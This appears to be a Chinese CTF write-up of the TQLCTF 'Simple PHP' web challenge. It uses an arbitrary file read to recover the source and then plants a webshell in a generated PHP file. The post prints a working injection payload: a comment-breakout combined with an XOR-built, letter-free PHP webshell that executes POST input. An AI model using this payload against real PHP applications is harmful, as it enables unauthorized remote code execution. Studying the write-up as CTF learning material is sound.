MENU

Catalog

    TQLCTF-Simple PHP

    February 21, 2022 • Read: 508 • Competition WP

    注册登录,抓包发现有个地方有任意文件读取

    读取index.php
    关键代码

    if(preg_match('/[^\w\/\(\)\*<>]/', $_POST['user']) === 0){
    if (preg_match('/[^\w\/\*:\.\;\(\)\n<>]/', $_POST['website']) === 0){
        $_POST['punctuation'] = preg_replace("/[a-z,A-Z,0-9>\?]/","",$_POST['punctuation']);
        $template = file_get_contents('./template.html');
        $content = str_replace("__USER__", $_POST['user'], $template);
        $content = str_replace("__PASS__", $hash_pass, $content);
        $content = str_replace("__WEBSITE__", $_POST['website'], $content);
        $content = str_replace("__PUNC__", $_POST['punctuation'], $content);
        file_put_contents('sandbox/'.$hash_user.'.php', $content);
        echo("<script>alert('Successed!');</script>");
    }
    else{
        echo("<script>alert('Invalid chars in website!');</script>");
    }
}
else{
    echo("<script>alert('Invalid chars in username!');</script>");

    无字母和数字的getshell
    参考p神的文章:https://www.leavesongs.com/PENETRATION/webshell-without-alphanum.html
    控制的参数为punctuation,进行传参上马

    发现没被解析,猜想应该是解析为html,抓包继续利用任意文件读取本页面的源码

    关键代码:

    <?php
                    error_reporting(0);
                    $user = ((string)3);
                    $pass = ((string)zsfeccbc87e4b5ce2fe28308fd9f2a7baf3);

                    if(isset($_COOKIE['user']) && isset($_COOKIE['pass']) && $_COOKIE['user'] === $user && $_COOKIE['pass'] === $pass){
                        echo($_COOKIE['user']);
                    }
                    else{
                        die("<script>alert('Permission denied!');</script>");
                    }
                    ?>
                </li>
            </ul>
            <ul class="item">
                <li><span class="sitting_btn"></span>系统设置</li>
                <li><span class="help_btn"></span>使用指南 <b></b></li>
                <li><span class="about_btn"></span>关于我们</li>
                <li><span class="logout_btn"></span>退出系统</li>
            </ul>
        </div>
    </div>
</div>
<a href="#" class="powered_by">$_=(''^'`').(''^'`').(''^'`').(''^'`').(''^'`').(''^'`');$__='_'.('
    '^']').('/'^'`').(''^']').('  '^']');$___=$$__;$_($___[_]);</a>
<ul id="deskIcon">
    <li class="desktop_icon" id="win5" path="https://image.baidu.com/"> <span class="icon"><img src="../img/icon4.png"/></span>

    确实解析为html,但是关键点$user = ((string)3); 3是user的值,然后我们就能进行注释绕过

    所以pylaod:

    user=1)/*&pass=1&website=1&punctuation=*/;$_=('%01'^'`').('%13'^'`'). ('%13'^'`').('%05'^'`').('%12'^'`').('%14'^'`');$__='_'.('%0D'^']').('%2F'^'`'). ('%0E'^']').('%09'^']');$___=$$__;$_($___[_]);/*

    成功rce

    TQLCTF-SQL_TEST
    出题人的出题日记:https://igml.top/2022/02/20/TQLCTF2022/
    自己还是太菜了 哈哈哈

    声明:本文仅限技术研究与讨论,严禁用于非法用途,否则产生的一切后果自行承担! 本网站采用BY-NC-SA协议进行授权!转载请注明文章来源! 图片失效请留言通知博主及时更改!

    Last Modified: March 2, 2022
    Archives Tip
    QR Code for this page
    Tipping QR Code
    Leave a Comment